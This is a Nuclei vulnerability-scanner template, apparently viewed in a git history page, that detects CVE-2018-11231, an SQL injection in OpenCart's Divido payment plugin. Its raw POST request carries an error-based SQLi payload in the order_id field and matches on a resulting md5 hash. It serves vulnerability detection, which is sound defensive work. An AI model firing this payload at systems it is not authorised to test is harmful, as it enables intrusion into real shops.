nuclei-templates/cves/2018/CVE-2018-11231.yaml

38 lines
1.0 KiB
YAML
Raw Normal View History

2022-05-03 20:08:00 +00:00
id: CVE-2018-11231
info:
2022-05-07 11:09:37 +00:00
name: Opencart Divido plugin - Sql Injection
2022-05-03 20:08:00 +00:00
author: ritikchaddha
severity: high
reference:
- http://foreversong.cn/archives/1183
2022-05-07 11:09:37 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-11231
2022-05-03 20:08:00 +00:00
tags: opencart,sqli,cve,cve2018
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.10
cve-id: CVE-2018-11231
cwe-id: CWE-89
description: "In the Divido plugin for OpenCart, there is SQL injection. Attackers can use SQL injection to get some confidential information."
2022-05-03 20:08:00 +00:00
requests:
- raw:
- |
POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1
Host: {{Hostname}}
{"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)"},"status":2}
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
2022-05-07 11:09:37 +00:00
part: body
2022-05-03 20:08:00 +00:00
words:
- "6f7c6dcbc380aac3bcba1f9fccec991e"
- type: status
status:
- 200